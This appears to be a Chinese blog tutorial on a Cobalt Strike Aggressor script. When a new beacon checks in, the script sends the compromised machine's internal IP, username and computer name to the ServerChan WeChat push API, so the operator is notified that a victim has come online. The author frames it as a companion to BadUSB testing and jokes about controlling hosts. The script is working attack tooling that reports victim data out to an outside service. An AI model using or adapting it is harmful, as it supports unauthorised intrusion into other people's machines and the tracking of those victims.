之前看过一篇CS客户端上线微信通知的文章:
https://blog.csdn.net/BROTHERYY/article/details/108626414
当我在设置的时候服务端域名和设置方式已经更新,正好在测试badusb,所以顺便把这个也测试了。
1. Server酱介绍
================================
Server酱是什么
「Server酱」,英文名「ServerChan」,是一款「手机」和「服务器」、「智能设备」之间的通信软件。
说人话?就是从服务器、路由器等设备上推消息到手机的工具。
开通并使用上它,只需要一分钟:
微信扫码登入
设置消息通道
发消息,一般有两种方式:
在支持Server酱的软件界面或配置文件中填入SendKey,即可使用
你也可以自己往 https://sctapi.ftqq.com/.send 发送请求,就可以收到消息啦。
====================
以上内容转自Server酱。
2. 设置步骤:
首先打开网站:
点击登录,出现二维码,微信扫描二维码,点击关注。
点击扫码后继续。
点击复制SendKey。
使用以下代码:
# 循环获取所有beacon
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
#获取ip、计算机名、登录账号
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
#get一下Server酱的链接
$url = 'https://sctapi.ftqq.com/***************.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}
星号部分用自己的SendKey代替。
扫描二维码关注公众号,回复:
15103310 查看本文章
text=""内容url编码的,解码后:
CobaltStrike上线提醒&desp=他来了、他来了,他脚踏祥云走来了。
ip:'.$internalIP.'
用户名:'.$userName.'
计算机名:'.$computerName;
这部分可以自己设置内容部分,保留变量设置即可。
以上全部脚本编辑完毕后保存到CS客户端上,文件后缀名cna
点击脚本管理器,点击加载,浏览到cna文件。
3.效果
点击查看详情:
每天免费5条通知,够用了。每天能控制到5台主机那是什么情况。